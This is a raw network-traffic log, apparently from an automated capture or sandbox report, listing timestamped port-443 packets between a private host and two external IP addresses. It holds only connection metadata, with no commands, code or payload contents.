Apr 8, 2022 12:12:56.764130116 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.764952898 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.790076017 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.790126085 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.790294886 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.790308952 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.793283939 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.793328047 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.793471098 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.793490887 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.793505907 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.793538094 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.793587923 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.793596983 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.793603897 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.793646097 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.793673992 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.793715954 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.793721914 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.793737888 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.793776989 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.793806076 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.793850899 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.793855906 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.793883085 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.793885946 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.793962955 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.793993950 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.794039011 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.794044971 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.794054031 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.794125080 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.794156075 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.794209003 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.794215918 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.794271946 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.794589043 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.794622898 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.794682980 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.794689894 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.794718027 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.794872046 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.815069914 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.815126896 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.815316916 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.815335035 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.819063902 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.819117069 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.819247961 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.819264889 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.820525885 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.820574999 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.820615053 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.820631027 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.820637941 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.820885897 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.820926905 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.820967913 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.820976019 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.820986986 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.821167946 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.821202040 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.821239948 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.821249008 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.821260929 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.821489096 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.821521997 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.821547031 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.821553946 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.821568012 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.821614027 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.821665049 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.821672916 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.821702957 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.821746111 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.821913004 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.824289083 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.824317932 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:13:10.013293982 CEST	49172	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:10.013350964 CEST	443	49172	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:10.013434887 CEST	49172	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:10.021089077 CEST	49172	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:10.021115065 CEST	443	49172	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:10.084916115 CEST	443	49172	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:10.085051060 CEST	49172	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:10.097062111 CEST	49172	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:10.097096920 CEST	443	49172	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:10.097438097 CEST	443	49172	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:10.302192926 CEST	443	49172	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:10.305150032 CEST	49172	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:10.491786957 CEST	49172	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:10.519036055 CEST	443	49172	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:10.523616076 CEST	49172	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:10.566184044 CEST	443	49172	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:10.681637049 CEST	443	49172	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:10.681731939 CEST	443	49172	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:10.681776047 CEST	49172	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:10.682540894 CEST	49172	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:12.058976889 CEST	49173	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:12.059020042 CEST	443	49173	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:12.059092999 CEST	49173	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:12.059736013 CEST	49173	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:12.059758902 CEST	443	49173	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:12.119524002 CEST	443	49173	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:12.124363899 CEST	49173	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:12.124394894 CEST	443	49173	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:12.174809933 CEST	443	49173	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:12.176595926 CEST	49173	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:12.176626921 CEST	443	49173	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:12.176686049 CEST	49173	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:12.176702976 CEST	443	49173	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:12.337531090 CEST	443	49173	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:12.337634087 CEST	443	49173	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:12.337738991 CEST	49173	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:12.339278936 CEST	49173	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.246073961 CEST	49174	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.246141911 CEST	443	49174	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.246206999 CEST	49174	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.246949911 CEST	49174	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.246989012 CEST	443	49174	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.270622015 CEST	49175	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.270682096 CEST	443	49175	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.270750046 CEST	49175	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.271976948 CEST	49175	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.272006035 CEST	443	49175	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.305064917 CEST	443	49174	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.329684973 CEST	443	49175	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.334954977 CEST	49174	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.335021973 CEST	443	49174	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.338438034 CEST	49175	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.338469982 CEST	443	49175	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.364196062 CEST	443	49174	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.365039110 CEST	49174	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.385205030 CEST	443	49175	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.392654896 CEST	49175	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.392680883 CEST	443	49175	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.392735958 CEST	49175	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.392745018 CEST	443	49175	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.392823935 CEST	49175	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.392838001 CEST	443	49175	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.392901897 CEST	49175	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.392914057 CEST	443	49175	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.393013000 CEST	49175	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.393026114 CEST	443	49175	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.393079042 CEST	49175	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.393085957 CEST	443	49175	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.394582033 CEST	49175	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.394599915 CEST	443	49175	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.394663095 CEST	49175	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.394671917 CEST	443	49175	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.406224966 CEST	443	49174	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.462568045 CEST	443	49174	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.462707996 CEST	443	49174	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.462765932 CEST	49174	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.463526011 CEST	49174	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.792077065 CEST	443	49175	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.792177916 CEST	443	49175	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:16.792277098 CEST	49175	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:16.793147087 CEST	49175	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:21.914521933 CEST	49176	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:21.914575100 CEST	443	49176	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:21.914644003 CEST	49176	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:21.916059017 CEST	49176	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:21.916090012 CEST	443	49176	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:21.972709894 CEST	443	49176	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:21.976171017 CEST	49176	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:21.976200104 CEST	443	49176	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:22.026082039 CEST	443	49176	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:22.029196978 CEST	49176	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:22.029230118 CEST	443	49176	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:22.029304981 CEST	49176	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:22.029320955 CEST	443	49176	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:22.029393911 CEST	49176	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:22.029411077 CEST	443	49176	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:22.029503107 CEST	49176	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:22.029524088 CEST	443	49176	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:22.029629946 CEST	49176	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:22.029652119 CEST	443	49176	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:22.029721022 CEST	49176	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:22.029735088 CEST	443	49176	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:22.030817032 CEST	49176	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:22.030859947 CEST	443	49176	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:22.030958891 CEST	49176	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:22.030977011 CEST	443	49176	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:22.363962889 CEST	443	49176	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:22.364095926 CEST	443	49176	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:22.364168882 CEST	49176	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:22.364795923 CEST	49176	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:29.571433067 CEST	49177	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:29.571480036 CEST	443	49177	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:29.571615934 CEST	49177	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:29.572468996 CEST	49177	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:29.572488070 CEST	443	49177	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:29.632694960 CEST	443	49177	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:29.643769979 CEST	49177	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:29.643820047 CEST	443	49177	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:29.789602041 CEST	443	49177	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:29.794089079 CEST	49177	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:29.794137001 CEST	443	49177	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:29.794220924 CEST	49177	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:29.794231892 CEST	443	49177	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:29.794307947 CEST	49177	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:29.794334888 CEST	443	49177	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:29.794475079 CEST	49177	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:29.794488907 CEST	443	49177	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:29.794580936 CEST	49177	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:29.794598103 CEST	443	49177	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:29.794645071 CEST	49177	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:29.794651985 CEST	443	49177	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:29.796860933 CEST	49177	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:29.796896935 CEST	443	49177	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:29.796994925 CEST	49177	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:29.797005892 CEST	443	49177	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:30.188848972 CEST	443	49177	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:30.188951969 CEST	443	49177	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:30.189007044 CEST	49177	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:30.189594030 CEST	49177	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:38.409372091 CEST	49178	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:38.409442902 CEST	443	49178	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:38.409533024 CEST	49178	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:38.410448074 CEST	49178	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:38.410484076 CEST	443	49178	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:38.471405983 CEST	443	49178	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:38.475723982 CEST	49178	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:38.475794077 CEST	443	49178	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:38.527967930 CEST	443	49178	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:38.532435894 CEST	49178	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:38.532541037 CEST	443	49178	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:38.532686949 CEST	49178	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:38.532723904 CEST	443	49178	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:38.532859087 CEST	49178	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:38.532892942 CEST	443	49178	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:38.533042908 CEST	49178	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:38.533077955 CEST	443	49178	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:38.533251047 CEST	49178	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:38.533284903 CEST	443	49178	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:38.533389091 CEST	49178	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:38.533406973 CEST	443	49178	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:38.535857916 CEST	49178	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:38.535900116 CEST	443	49178	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:38.536052942 CEST	49178	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:38.536079884 CEST	443	49178	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:38.975409031 CEST	443	49178	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:38.975514889 CEST	443	49178	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:38.975594997 CEST	49178	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:38.976135015 CEST	49178	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:49.070415974 CEST	49179	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:49.070456028 CEST	443	49179	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:49.070538044 CEST	49179	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:49.071269035 CEST	49179	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:49.071283102 CEST	443	49179	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:49.127943993 CEST	443	49179	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:49.135031939 CEST	49179	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:49.135063887 CEST	443	49179	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:49.185441971 CEST	443	49179	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:49.188581944 CEST	49179	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:49.188607931 CEST	443	49179	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:49.188677073 CEST	49179	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:49.188688040 CEST	443	49179	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:49.188750029 CEST	49179	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:49.188766003 CEST	443	49179	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:49.188838005 CEST	49179	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:49.188853025 CEST	443	49179	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:49.188930035 CEST	49179	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:49.188946962 CEST	443	49179	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:49.188997984 CEST	49179	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:49.189007998 CEST	443	49179	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:49.190380096 CEST	49179	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:49.190403938 CEST	443	49179	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:49.190473080 CEST	49179	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:49.190486908 CEST	443	49179	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:49.516292095 CEST	443	49179	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:49.516434908 CEST	443	49179	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:49.516500950 CEST	49179	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:49.517273903 CEST	49179	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:57.634424925 CEST	49180	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:57.634485960 CEST	443	49180	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:57.634571075 CEST	49180	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:57.635540009 CEST	49180	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:57.635571003 CEST	443	49180	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:57.693121910 CEST	443	49180	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:57.697047949 CEST	49180	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:57.697078943 CEST	443	49180	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:57.748979092 CEST	443	49180	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:57.751530886 CEST	49180	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:57.751570940 CEST	443	49180	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:57.753249884 CEST	49180	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:57.753274918 CEST	443	49180	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:57.757281065 CEST	49180	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:57.757307053 CEST	443	49180	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:57.761281967 CEST	49180	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:57.761310101 CEST	443	49180	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:57.763290882 CEST	49180	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:57.763317108 CEST	443	49180	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:57.769324064 CEST	49180	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:57.769378901 CEST	443	49180	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:57.771761894 CEST	49180	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:57.771799088 CEST	443	49180	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:58.101690054 CEST	443	49180	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:58.101805925 CEST	443	49180	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:58.101914883 CEST	49180	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:58.102745056 CEST	49180	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:58.439757109 CEST	49181	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:58.439819098 CEST	443	49181	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:58.439889908 CEST	49181	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:58.440432072 CEST	49181	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:58.440464020 CEST	443	49181	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:58.498217106 CEST	443	49181	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:58.505189896 CEST	49181	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:58.505242109 CEST	443	49181	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:58.551603079 CEST	443	49181	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:58.553144932 CEST	49181	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:58.553195000 CEST	443	49181	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:58.553293943 CEST	49181	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:58.553309917 CEST	443	49181	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:58.554207087 CEST	49181	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:58.554245949 CEST	443	49181	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:58.554379940 CEST	49181	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:58.554399014 CEST	443	49181	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:58.554488897 CEST	49181	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:58.554512024 CEST	443	49181	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:58.554616928 CEST	49181	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:58.554807901 CEST	443	49181	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:58.554913998 CEST	49181	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:58.554955959 CEST	443	49181	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:59.062995911 CEST	443	49181	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:59.063204050 CEST	443	49181	149.154.167.220	192.168.2.22
Apr 8, 2022 12:13:59.063390970 CEST	49181	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:13:59.064091921 CEST	49181	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:03.984554052 CEST	49182	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:03.984606028 CEST	443	49182	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:03.984683037 CEST	49182	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:03.985966921 CEST	49182	443	192.168.2.22	149.154.167.220
